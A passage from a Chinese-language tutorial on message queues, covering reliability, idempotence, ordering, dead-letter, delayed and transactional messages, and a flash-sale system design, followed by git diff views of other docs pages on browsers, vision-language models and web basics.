def on_product_click(user_id, product_id):
mq.publish("user.action", {
"type": "click",
"user_id": user_id,
"product_id": product_id,
"timestamp": time.time()
})
# 消费者 1:推荐系统(更新用户画像)
def update_user_profile(data):
if data["type"] == "click":
profile.add_interest(data["user_id"], data["product_id"])
# 消费者 2:实时统计(点击量计数)
def increment_click_count(data):
redis.incr(f"product:{data['product_id']}:clicks")
# 消费者 3:数据仓库(离线分析)
def save_to_data_warehouse(data):
warehouse.insert("user_actions", data)
```
<PubSubDemo />
**关键点**:发布订阅模式让数据可以"一写多读",每个系统各取所需。
---
## 4. 可靠性保证
### 4.1 消息不丢失
从三个维度保证:
#### 生产者不丢
```python
# 确认机制 (ACK)
try:
mq.publish_with_confirm("order.created", order_data)
# 收到 Broker 确认后才认为发送成功
except Exception as e:
# 发送失败,重试或记录日志
log.error(f"发送失败: {e}")
retry_later(order_data)
```
#### Broker 不丢
- **持久化**:消息写入磁盘,而不是只存在内存。
- **多副本**:Kafka 的多副本机制,保证一台机器挂了数据不丢。
```python
# Kafka 配置示例
# acks=all: 所有副本都确认才算成功
producer.send(
topic="orders",
value=order_data,
acks="all" # 或 -1
).get()
```
#### 消费者不丢
```python
# 手动确认 (Manual ACK)
def process_message(msg):
try:
# 处理业务逻辑
handle_order(msg.body)
# 业务成功后才确认消息
msg.ack()
except Exception as e:
# 业务失败,拒绝消息(会重新投递)
msg.nack(requeue=True)
```
<MessageReliabilityDemo />
### 4.2 消息不重复
消息可能会重复投递(网络抖动、消费者重启),所以需要**幂等性**。
**什么是幂等性?**
- 执行一次和执行多次,结果相同。
- _例子_`SET x = 1` 是幂等的,`INCREMENT x` 不是。
**实现幂等性**
```python
# 方案 1: 数据库唯一约束
def create_order(order_id, user_id, product_id):
try:
db.execute(
"INSERT INTO orders (id, user_id, product_id) VALUES (?, ?, ?)",
order_id, user_id, product_id
)
except DuplicateKeyError:
# 订单已存在,直接返回(幂等)
return get_order(order_id)
# 方案 2: Redis 去重表
def process_message(msg):
message_id = msg.id
# 检查是否已处理
if redis.set(f"processed:{message_id}", "1", nx=True, ex=3600):
# 第一次处理
handle_business(msg.body)
else:
# 已处理过,跳过
log.info(f"消息 {message_id} 已处理,跳过")
```
<IdempotenceDemo />
### 4.3 消息顺序性
某些场景需要保证消息的顺序(如订单状态:创建 → 支付 → 发货)。
**问题**:多个消费者并发消费,可能导致顺序错乱。
**解决方案**
1. **单分区 / 单队列**
- 把需要有序的消息发到同一个分区/队列。
- 一个分区只能被一个消费者消费。
```python
# Kafka 示例:根据 user_id 分区
producer.send(
topic="orders",
value=order_data,
partition_key=order_data["user_id"] # 同一个用户的消息会进入同一个分区
)
```
2. **内存排序**
- 消费者在内存中缓存消息,排序后再处理。
```python
from collections import defaultdict
messages = defaultdict(list)
def process_message(msg):
sequence_number = msg.sequence_number
user_id = msg.user_id
# 缓存消息
messages[user_id].append((sequence_number, msg))
# 排序并处理
messages[user_id].sort()
for seq, m in messages[user_id]:
if not is_processed(m):
handle_business(m)
mark_processed(m)
```
<MessageOrderingDemo />
**关键点**:全局有序性能差,通常只需要**局部有序**(如单个用户的消息有序)。
---
## 5. 高级特性
### 5.1 死信队列 (DLQ, Dead Letter Queue)
处理无法消费的消息。
**场景**:消息格式错误、业务逻辑失败(重试 N 次后仍失败)。
```python
# RabbitMQ 示例
queue_args = {
"x-dead-letter-exchange": "dlx", # 死信交换机
"x-dead-letter-routing-key": "dlq", # 死信队列
"x-max-retries": 3 # 最大重试次数
}
def process_message(msg):
try:
handle_business(msg.body)
msg.ack()
except Exception as e:
msg.retries += 1
if msg.retries >= 3:
# 超过重试次数,发送到死信队列
msg.reject(requeue=False)
else:
# 重新入队,稍后重试
msg.nack(requeue=True)
```
**死信队列的作用**
- 隔离异常消息,避免阻塞正常消息。
- 保留失败消息,方便后续人工介入或分析。
<DeadLetterQueueDemo />
### 5.2 延迟消息 (Delayed Message)
指定时间后才消费消息。
**场景**
- 订单 30 分钟后自动取消。
- 定时提醒(明天 9 点提醒我开会)。
```python
# RocketMQ 示例
def send_delay_message(order_id, delay_level):
# delay_level = 1 表示 1s, 2 表示 5s, ... 16 表示 2h
producer.send(
topic="order.cancel",
body={"order_id": order_id},
delay_level=14 # 15 分钟后取消
)
# Redis + 定时任务方案
def schedule_order_cancellation(order_id, delay_seconds):
redis.zadd(
"order.cancellations",
{order_id: time.time() + delay_seconds}
)
# 定时扫描(每秒执行一次)
def cancel_expired_orders():
now = time.time()
expired_orders = redis.zrangebyscore(
"order.cancellations",
0,
now
)
for order_id in expired_orders:
cancel_order(order_id)
redis.zrem("order.cancellations", order_id)
```
<DelayedMessageDemo />
### 5.3 事务消息 (Transactional Message)
保证本地事务和消息发送的一致性。
**场景**:订单创建成功 → 发送"扣减库存"消息。
**问题**:订单创建了,但消息没发送成功(网络故障)。
**解决方案**RocketMQ 事务消息):
```python
# 1. 发送半消息(half message
producer.send_half_message(topic="order.deduct_stock", body=order_data)
# 2. 执行本地事务
def execute_local_transaction(msg):
try:
create_order_in_db(msg.body)
return COMMIT # 本地事务成功,提交消息
except Exception as e:
return ROLLBACK # 本地事务失败,回滚消息
# 3. RocketMQ 回查(如果长时间未收到确认)
def check_local_transaction(msg):
order = db.get_order(msg.body["order_id"])
if order:
return COMMIT # 订单存在,说明本地事务成功
else:
return ROLLBACK
```
<TransactionMessageDemo />
**关键点**:事务消息保证了"要么都成功,要么都失败"。
---
## 6. 实战:设计一个秒杀系统
### 6.1 需求分析
- **高并发**:1 秒内有 10 万个请求。
- **不超卖**:库存 100 个,不能卖出 101 个。
- **用户体验**:立即返回"排队中",而不是让用户等待。
### 6.2 架构设计
```
用户请求
[网关] 限流:只放行 1 万/秒
[Redis] 预扣减库存(原子操作)
↓ 成功
[消息队列] 缓冲订单请求
[订单服务] 慢慢创建订单
[消息队列] 订单完成通知
[通知服务] 发送短信/推送
```
### 6.3 代码实现
```python
# 秒杀接口
def seckill(user_id, product_id):
# 1. Redis 预扣减库存(原子操作)
stock_key = f"seckill:stock:{product_id}"
success = redis.eval(
"""
if redis.call('get', KEYS[1]) > 0 then
redis.call('decr', KEYS[1])
return 1
else
return 0
end
""",
1,
stock_key
)
if not success:
return {"error": "库存不足"}
# 2. 发送消息到队列
mq.publish(
"seckill.orders",
{
"user_id": user_id,
"product_id": product_id,
"timestamp": time.time()
}
)
# 3. 立即返回
return {"status": "排队中", "queue_position": get_queue_position()}
# 订单服务消费者
def handle_seckill_order(data):
user_id = data["user_id"]
product_id = data["product_id"]
# 1. 创建订单(数据库)
try:
order = db.create_order(user_id, product_id, status="PROCESSING")
except Exception as e:
# 创建失败,恢复库存
redis.incr(f"seckill:stock:{product_id}")
log.error(f"创建订单失败: {e}")
return
# 2. 发送"订单创建成功"消息
mq.publish(
"seckill.order.created",
{
"order_id": order.id,
"user_id": user_id,
"product_id": product_id
}
)
# 通知服务消费者
def handle_order_created(data):
order_id = data["order_id"]
user_id = data["user_id"]
# 1. 发送短信
sms.send(user_id, f"您的订单 {order_id} 已创建成功")
# 2. 发送推送
push.send(user_id, {"title": "订单创建成功", "body": "..."})
# 3. 更新订单状态
db.update_order_status(order_id, "NOTIFIED")
```
### 6.4 监控与告警
```python
# 监控指标
metrics = {
"queue_length": mq.get_queue_length("seckill.orders"), # 队列长度
"processing_speed": mq.get_processing_speed(), # 处理速度
"success_rate": calculate_success_rate(), # 成功率
"average_latency": calculate_average_latency(), # 平均延迟
}
# 告警规则
if metrics["queue_length"] > 10000:
alert("队列积压过多,请增加消费者")
if metrics["success_rate"] < 0.95:
alert("成功率过低,请检查业务逻辑")
```
<SeckillSystemDemo />
**关键点**
- 用 Redis 做第一道防线(快速拦截)。
- 用消息队列做缓冲(削峰)。
- 异步处理真正的业务逻辑。
---
## 7. 总结与学习路线
消息队列是后端系统的"核心基础设施",掌握它能让你的系统更可靠、更高效。
### 7.1 核心知识点
| 知识点 | 重要程度 | 难度 | 实战频率 |
| :--------------------- | :--------- | :--- | :------- |
| **点对点 / 发布订阅** | ⭐⭐⭐⭐⭐ | 低 | 极高 |
| **削峰填谷** | ⭐⭐⭐⭐⭐ | 中 | 极高 |
| **消息可靠性(不丢)** | ⭐⭐⭐⭐⭐ | 高 | 极高 |
| **幂等性** | ⭐⭐⭐⭐⭐ | 中 | 极高 |
| **消息顺序** | ⭐⭐⭐⭐ | 高 | 中 |
| **死信队列** | ⭐⭐⭐⭐ | 低 | 高 |
| **延迟消息** | ⭐⭐⭐⭐ | 中 | 中 |
| **事务消息** | ⭐⭐⭐ | 高 | 低 |
### 7.2 学习路线
1. **入门**1-2 天):
- 理解消息队列的核心概念(生产者、消费者、Broker)。
- 掌握点对点和发布订阅两种模式。
- 用 Redis Stream 或 RabbitMQ 实现简单的异步任务。
2. **进阶**1 周):
- 实现削峰填谷(如秒杀系统)。
- 保证消息可靠性(持久化、ACK、重试)。
- 实现幂等性(唯一 ID、去重表)。
3. **实战**2-4 周):
- 设计一个完整的异步处理系统(订单、通知、积分)。
- 接入监控,实时观测队列长度、消费速度。
- 处理异常场景(死信队列、重试策略)。
4. **深入**(持续):
- 学习 Kafka 的高可用架构(多副本、分区)。
- 研究 RocketMQ 的事务消息。
- 探索消息队列在流式处理中的应用(Flink、Spark)。
### 7.3 推荐资源
- **书籍**
- 《Kafka 权威指南》
- 《RabbitMQ 实战指南》
- **文章**
- RabbitMQ 官方文档: https://www.rabbitmq.com/getstarted.html
- Kafka 官方文档: https://kafka.apache.org/documentation/
- **工具**
- RabbitMQ Management Plugin (Web 管理界面)
- Kafka Tool (Kafka 可视化)
---
## 8. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :---------------------- | :---------------- | :-------------------------------------------------------------------- |
| **MQ** | Message Queue | **消息队列**。用于异步通信的中间件,实现生产者和消费者的解耦。 |
| **Producer** | - | **生产者**。发送消息的一方。 |
| **Consumer** | - | **消费者**。接收并处理消息的一方。 |
| **Broker** | - | **消息代理**。存储和转发消息的服务端程序。 |
| **Topic** | - | **主题**。消息的逻辑分类(如 "orders")。 |
| **Queue** | - | **队列**。存储消息的物理容器。 |
| **Partition** | - | **分区**。Kafka 的概念,一个 Topic 可以分成多个 Partition,提升并发。 |
| **ACK** | Acknowledgment | **确认**。消费者处理完消息后,向 Broker 确认。 |
| **Pub/Sub** | Publish/Subscribe | **发布订阅**。一种消息模式,一条消息可被多个消费者接收。 |
| **P2P** | Point-to-Point | **点对点**。一种消息模式,一条消息只能被一个消费者接收。 |
| **DLQ** | Dead Letter Queue | **死信队列**。存放无法消费的消息。 |
| **Idempotence** | - | **幂等性**。多次执行结果相同。 |
| **Throughput** | - | **吞吐量**。单位时间内处理的消息数量。 |
| **Latency** | - | **延迟**。消息从发送到被接收的时间差。 |
| **Persistence** | - | **持久化**。消息写入磁盘,而非仅存内存。 |
| **Replication** | - | **副本**。为了高可用,消息被复制到多个节点。 |
| **Transaction Message** | - | **事务消息**。保证本地事务和消息发送的一致性。 |
docs/zh-cn/appendix/tracking-design.md
+1093
View File
File diff suppressed because it is too large Load Diff
docs/zh-cn/appendix/url-to-browser.md
+7 -7
View File
@@ -131,12 +131,12 @@
从 URL 输入到页面显示,这短短的几秒钟内,凝聚了计算机网络几十年的智慧结晶。
| 阶段 | 核心任务 | 关键技术 | 类比 |
| :--- | :--- | :--- | :--- |
| **1. 寻址** | 解析目标 | URL | 确定目的地地址 |
| **2. 定位** | 查找 IP | DNS | 查电话簿 |
| **3. 连接** | 建立通路 | TCP/TLS | 打电话确认通畅 |
| **4. 交流** | 交换数据 | HTTP | 点餐对话 |
| **5. 展示** | 绘制页面 | Rendering | 装修房子 |
| 阶段 | 核心任务 | 关键技术 | 类比 |
| :---------- | :------- | :-------- | :------------- |
| **1. 寻址** | 解析目标 | URL | 确定目的地地址 |
| **2. 定位** | 查找 IP | DNS | 查电话簿 |
| **3. 连接** | 建立通路 | TCP/TLS | 打电话确认通畅 |
| **4. 交流** | 交换数据 | HTTP | 点餐对话 |
| **5. 展示** | 绘制页面 | Rendering | 装修房子 |
现在,当你再次按下回车键时,你已经看到了屏幕背后的那个忙碌而精彩的数字世界。
docs/zh-cn/appendix/vlm-intro.md
+13 -10
View File
@@ -11,6 +11,7 @@
**多模态大模型 (VLM)** 的出现,相当于给这个大脑装上了一双**眼睛**。
但这并不容易。因为:
- **大脑 (LLM)** 只懂**文字**(准确说是 Token ID)。
- **眼睛 (摄像头)** 看到的是**像素**(RGB 颜色数值)。
@@ -64,6 +65,7 @@ LLM 习惯读单词。为了配合它,我们得把一张完整的图片切成
Projector 的工作就是把**视觉特征向量**(ViT 的输出)转换成**文本特征向量**(LLM 的输入)。
你可以把它理解为**外语翻译器**
- **输入**:视觉语言(ViT output
- **处理**:翻译(矩阵变换)
- **输出**LLM 语言(LLM embedding
@@ -103,17 +105,17 @@ Projector 的工作就是把**视觉特征向量**(ViT 的输出)转换成**
1. **眼睛 (Vision Encoder)**
- 负责看图。
- 通常直接借用现成的、训练好的视觉模型(如 CLIP, SigLIP)。
- *它就像视网膜,负责感光。*
- _它就像视网膜,负责感光。_
2. **视神经 (Projector)**
- 负责传输和翻译信号。
- 这是 VLM 训练的重点。
- *它连接眼睛和大脑。*
- _它连接眼睛和大脑。_
3. **大脑 (LLM)**
- 负责思考和回答。
- 借用现成的强大 LLM(如 Vicuna, Qwen)。
- *它负责理解看到了什么,并组织语言回答。*
- _它负责理解看到了什么,并组织语言回答。_
---
@@ -157,6 +159,7 @@ Projector 的工作就是把**视觉特征向量**(ViT 的输出)转换成**
简单说,就是**“拼图法”**。
如果图片很大(比如 $1000 \times 1000$),模型不会强行把它缩小,而是:
1. 把它切成好几张 $336 \times 336$ 的小图。
2. 分别看这些小图(看细节)。
3. 再把全图缩小看一遍(看全貌)。
@@ -184,10 +187,10 @@ Projector 的工作就是把**视觉特征向量**(ViT 的输出)转换成**
## 7. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :--- | :--- | :--- |
| **VLM** | Vision-Language Model | **多模态大模型**。能看懂图的 GPT。 |
| **ViT** | Vision Transformer | **视觉模型**。VLM 的“眼睛”,负责把像素变成向量。 |
| **Patch** | - | **图像块**。图片被切成的小方块,相当于“视觉单词”。 |
| **Projector** | - | **投射器/翻译官**。连接眼睛和大脑的桥梁。 |
| **Alignment** | - | **对齐**。让图像特征和文本特征在同一个空间里“互相听得懂”。 |
| 名词 | 全称 | 解释 |
| :------------ | :-------------------- | :--------------------------------------------------------- |
| **VLM** | Vision-Language Model | **多模态大模型**。能看懂图的 GPT。 |
| **ViT** | Vision Transformer | **视觉模型**。VLM 的“眼睛”,负责把像素变成向量。 |
| **Patch** | - | **图像块**。图片被切成的小方块,相当于“视觉单词”。 |
| **Projector** | - | **投射器/翻译官**。连接眼睛和大脑的桥梁。 |
| **Alignment** | - | **对齐**。让图像特征和文本特征在同一个空间里“互相听得懂”。 |
docs/zh-cn/appendix/web-basics.md
+44 -39
View File
@@ -55,9 +55,10 @@
### 2.1 只有 HTML 会怎样?
就像**毛坯房**:有墙有窗,能住人,但**丑**。
* 文字黑乎乎,挤在一起。
* 图片乱排,大小不一
* 没有任何设计感
- 文字黑乎乎,挤在一起
- 图片乱排,大小不一
- 没有任何设计感。
### 2.2 解决方案:请个“装修队” (CSS)
@@ -66,16 +67,16 @@
```css
/* 谁? { 改什么: 变成啥; } */
h1 {
color: red; /* 颜色变红 */
font-size: 24px; /* 字变大 */
text-align: center;/* 居中放 */
color: red; /* 颜色变红 */
font-size: 24px; /* 字变大 */
text-align: center; /* 居中放 */
}
.button {
background: #007bff; /* 蓝色背景 */
border: none; /* 不要边框 */
padding: 10px 20px; /* 撑大一点 */
border-radius: 5px; /* 圆角 */
border: none; /* 不要边框 */
padding: 10px 20px; /* 撑大一点 */
border-radius: 5px; /* 圆角 */
}
.button:hover {
@@ -91,7 +92,9 @@ h1 {
<!-- 2) 写在户型图背面(内部样式) -->
<style>
.box { background: blue; }
.box {
background: blue;
}
</style>
<!-- 3) 找专业装修公司出图纸(外部样式 - 推荐!) -->
@@ -133,24 +136,24 @@ h1 {
**在 AI 原生时代,解决这个问题有更聪明的方法:**
1. **直接问 AI (首选方案)**
* 现在的 AI 编程助手(如 Cursor、Trae、GitHub Copilot)已经非常强大。
* 你根本不需要背诵属性,直接用自然语言描述你的需求。
* **例子**:你对 AI 说 "我要一个带有阴影的蓝色圆形按钮",它会直接给你写出包含 `background-color`, `border-radius`, `box-shadow` 的完整代码。
* **为什么这是首选?** 因为它不仅告诉你“属性名”,还帮你把“值”都调好了。
- 现在的 AI 编程助手(如 Cursor、Trae、GitHub Copilot)已经非常强大。
- 你根本不需要背诵属性,直接用自然语言描述你的需求。
- **例子**:你对 AI 说 "我要一个带有阴影的蓝色圆形按钮",它会直接给你写出包含 `background-color`, `border-radius`, `box-shadow` 的完整代码。
- **为什么这是首选?** 因为它不仅告诉你“属性名”,还帮你把“值”都调好了。
2. **查文档 (MDN)**
* MDN Web Docs 是 Web 开发的权威字典。
* 搜 "MDN CSS text color",它会告诉你正确属性是 `color`
* 搜 "MDN CSS background",它会列出 `background-color`, `background-image` 等家族成员。
- MDN Web Docs 是 Web 开发的权威字典。
- 搜 "MDN CSS text color",它会告诉你正确属性是 `color`
- 搜 "MDN CSS background",它会列出 `background-color`, `background-image` 等家族成员。
3. **用浏览器“偷看” (DevTools)**
* 在喜欢的网页上**右键 -> 检查 (Inspect)**。
***Styles** 面板里,你可以看到人家用了什么属性。
* 你甚至可以直接在那里面试着改改数值,实时看效果(刷新就没了,很安全)。
- 在喜欢的网页上**右键 -> 检查 (Inspect)**。
- 在 **Styles** 面板里,你可以看到人家用了什么属性。
- 你甚至可以直接在那里面试着改改数值,实时看效果(刷新就没了,很安全)。
4. **CSS 游乐场**
* 下面的演示列出了一些最常用的“装修参数”。
* 试着拖动滑块、修改颜色,看看它们分别控制什么。
- 下面的演示列出了一些最常用的“装修参数”。
- 试着拖动滑块、修改颜色,看看它们分别控制什么。
<CssPlaygroundDemo />
@@ -164,6 +167,7 @@ h1 {
不要写 CSS 代码,直接在 HTML 标签上写“代号”。
- **传统写法**
```html
<button class="btn-primary">按钮</button>
<style>
@@ -186,6 +190,7 @@ h1 {
```
**为什么它这么火?**
1. **不用起名**:最头疼的“起类名”环节没了。
2. **不切文件**:不用在 HTML 和 CSS 文件之间切来切去。
3. **不怕删**:删掉 HTML 标签时,样式自动就没了,不会留下堆积如山的无用 CSS 代码。
@@ -268,9 +273,9 @@ document.getElementById('title').textContent = '新标题'
浏览器读取 HTML 代码后,不会把它们当成一堆字符串,而是会在内存里把它们画成一棵树。
* `<html>` 是祖先。
* `<body>``<html>` 的孩子。
* `div``p``button` 又是 `<body>` 的孩子。
- `<html>` 是祖先。
- `<body>``<html>` 的孩子。
- `div``p``button` 又是 `<body>` 的孩子。
这棵树就叫 **DOM 树**
@@ -291,33 +296,33 @@ graph TD
因为在 JS 眼里,HTML 标签不仅仅是标签,而是**对象 (Object)**。它们有属性,有方法。
* **属性 (Property)**
* `img.src` = "photo.jpg"
* `div.className` = "box"
* `input.value` = "123"
* **方法 (Method)**
* `button.click()` (假装被点了一下)
* `div.remove()` (自杀)
* `body.appendChild(newDiv)` (生个孩子)
- **属性 (Property)**
- `img.src` = "photo.jpg"
- `div.className` = "box"
- `input.value` = "123"
- **方法 (Method)**
- `button.click()` (假装被点了一下)
- `div.remove()` (自杀)
- `body.appendChild(newDiv)` (生个孩子)
### 4.3 怎么找节点?(CRUD)
就像在族谱里找人一样,JS 提供了很多方法:
1. **按身份证找 (ID)**
* `document.getElementById('header')` —— 全局唯一,最快。
- `document.getElementById('header')` —— 全局唯一,最快。
2. **按特征找 (Selector)**
* `document.querySelector('.card h2')` —— 就像写 CSS 一样找,很灵活。
- `document.querySelector('.card h2')` —— 就像写 CSS 一样找,很灵活。
3. **按关系找**
* `element.parentNode` (找爸爸)
* `element.children` (找孩子)
- `element.parentNode` (找爸爸)
- `element.children` (找孩子)
### 4.4 性能警告:不要频繁“拆家”
操作 DOM 是很贵的。每次你修改 DOM(比如改大小、改位置),浏览器都要重新计算排版(**Reflow**)和重新绘制(**Repaint**)。
* **低效**:循环 1000 次,每次往 `body` 里插入一个 `div`
* **高效**:先把 1000 个 `div` 拼好(DocumentFragment),一次性塞进 `body` 里。
-**低效**:循环 1000 次,每次往 `body` 里插入一个 `div`
-**高效**:先把 1000 个 `div` 拼好(DocumentFragment),一次性塞进 `body` 里。
这也正是 **Vue / React** 诞生的原因:它们在内存里玩“虚拟 DOM”,计算好最小修改量,最后才去动真正的 DOM,从而保护了性能。